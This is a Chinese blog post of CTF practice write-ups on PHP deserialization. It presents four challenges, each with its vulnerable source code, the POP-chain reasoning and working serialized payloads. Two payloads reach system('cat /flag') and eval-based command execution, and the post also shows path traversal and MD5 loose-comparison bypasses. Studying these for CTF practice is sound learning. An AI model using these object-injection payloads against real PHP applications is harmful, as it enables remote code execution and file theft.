PHP反序列化刷题（2）

最新推荐文章于 2024-07-16 09:28:46 发布

奫M

最新推荐文章于 2024-07-16 09:28:46 发布

阅读量88

点赞数

文章标签： php android 开发语言

本文链接：https://blog.csdn.net/mo2901600657/article/details/134564358

版权

今天课比较多，只刷了4个题还是反序列化。明天继续反序列化

1.[第五空间 2021]pklovecloud

pop链比较简单就不分析了

 <?php  
include 'flag.php';
class pkshow 
{  
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }  
} 

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}  

if (isset($_GET['pks']))  
{
    $logData = unserialize($_GET['pks']);
    echo $logData; 
} 
else 
{ 
    highlight_file(__file__); 
}
?>

下面的if的条件来分析一下

$this->openstack->neutron === $this->openstack->nova

<?php
class OpenStack {
    public $neutron;
    public $nova;
}

// 创建一个OpenStack对象
$openstack = new OpenStack();
$openstack->neutron = "value"; // 设置neutron属性的值
$openstack->nova = "value";    // 设置nova属性的值

// 序列化这个对象
$docker = serialize($openstack);
echo $docker;

?>

O:9:"OpenStack":2:{s:7:"neutron";s:5:"value";s:4:"nova";s:5:"value";}

 <?php  
class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
	    function __construct() 
    {      
        $this->cinder = new ace();
    }  
}  

class ace
{    
    public $filename='flag.php';     
    public $openstack;
    public $docker='O:9:"OpenStack":2:{s:7:"neutron";s:5:"value";s:4:"nova";s:5:"value";}'; 

}
$a=new acp();
echo urlencode(serialize($a));


?>

flag.php出现提示

然后把flag.php改为

../../../nssctfasdasdflag

2.[SWPUCTF 2022 新生赛]ez_1zpop

<?php
error_reporting(0);
class dxg
{
   function fmm()
   {
      return "nonono";
   }
}

class lt
{
   public $impo='hi';
   public $md51='weclome';
   public $md52='to NSS';
   function __construct()
   {
      $this->impo = new dxg;
   }
   function __wakeup()
   {
      $this->impo = new dxg;
      return $this->impo->fmm();
   }

   function __toString()
   {
      if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
         return $this->impo->fmm();
   }
   function __destruct()
   {
      echo $this;
   }
}

class fin
{
   public $a;
   public $url = 'https://www.ctfer.vip';
   public $title;
   function fmm()
   {
      $b = $this->a;
      $b($this->title);
   }
}

if (isset($_GET['NSS'])) {
   $Data = unserialize($_GET['NSS']);
} else {
   highlight_file(__file__);
}

pop链

fin fmm a=system  title=ls
lt_tostring impo=new fin()    md51=a[]   md51=b[]   
lt_destruct  _wakeup()绕过

我想的是用数组去绕过比较，发现不行，看了wp他们用的若比较

$a->md51="s155964671a";
$a->md52="s214587387a";

   public $md51='240610708';
   public $md52='QNKCDZO';

poc

<?php
class lt
{
   public $impo;
   public $md51='s214587387a';
   public $md52='s155964671a';
}

class fin
{
   public $a='system';
   public $url = 'https://www.ctfer.vip';
   public $title='cat /flag';

}
$a=new lt();
$a->impo=new fin();
echo serialize($a);


O:2:"lt":3:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:11:"s214587387a";s:4:"md52";s:11:"s155964671a";}

注意_wakeup()绕过

3. [MoeCTF 2021]unserialize

 <?php

class entrance
{
    public $start;

    function __construct($start)
    {
        $this->start = $start;
    }

    function __destruct()
    {
        $this->start->helloworld();
    }
}

class springboard
{
    public $middle;

    function __call($name, $arguments)
    {
        echo $this->middle->hs;
    }
}

class evil
{
    public $end;

    function __construct($end)
    {
        $this->end = $end;
    }

    function __get($Attribute)
    {
        eval($this->end);
    }
}

if(isset($_GET['serialize'])) {
    unserialize($_GET['serialize']);
} else {
    highlight_file(__FILE__);
}

pop分析

evil _get   $end=system("ls");
springboard _call $middle=new evil()
entrance _destruct $start=new springboard()

poc

 <?php

class entrance
{
    public $start;
}

class springboard
{
    public $middle;
}

class evil
{
    public $end='system("cat /flag");';

}
$a=new entrance();
$a->start=new springboard();
$a->start->middle=new evil();
echo serialize($a);


O:8:"entrance":1:{s:5:"start";O:11:"springboard":1:{s:6:"middle";O:4:"evil":1:{s:3:"end";s:20:"system("cat /flag");";}}}

4. [FSCTF 2023]ez_php1

md5($a)==md5($b)绕过 ?b[]=a&a[]=b FL_AG=1

<?php
highlight_file(__FILE__);
error_reporting(0);
include "globals.php";
$a = $_GET['b'];
$b = $_GET['a'];
if($a!=$b&&md5($a)==md5($b))
{
    echo "!!!";
    $c = $_POST['FL_AG'];
    if(isset($c))
    {
        if (preg_match('/^.*(flag).*$/', $ja)) {
            echo 'You are bad guy!!!';
        }
            else {
                echo "Congratulation!!";
                echo $hint1;
            }
    }
    else {
        echo "Please input my love FL_AG";
    }
} else{
    die("game over!");
}
?>

自信的人直接手写playload ?str=s:10:"YES I love";

<?php
highlight_file(__FILE__);
error_reporting(0);
class Clazz
{
    public $a;
    public $b;

    public function __wakeup()
    {
        $this->a = file_get_contents("php://filter/read=convert.base64-encode/resource=g0t_f1ag.php");
    }
    public function __destruct()
    {
        echo $this->b;
    }
}
@unserialize($_POST['data']);

?>

继续手写poc

不明白的看这个PHP反序列化（231119）-CSDN博客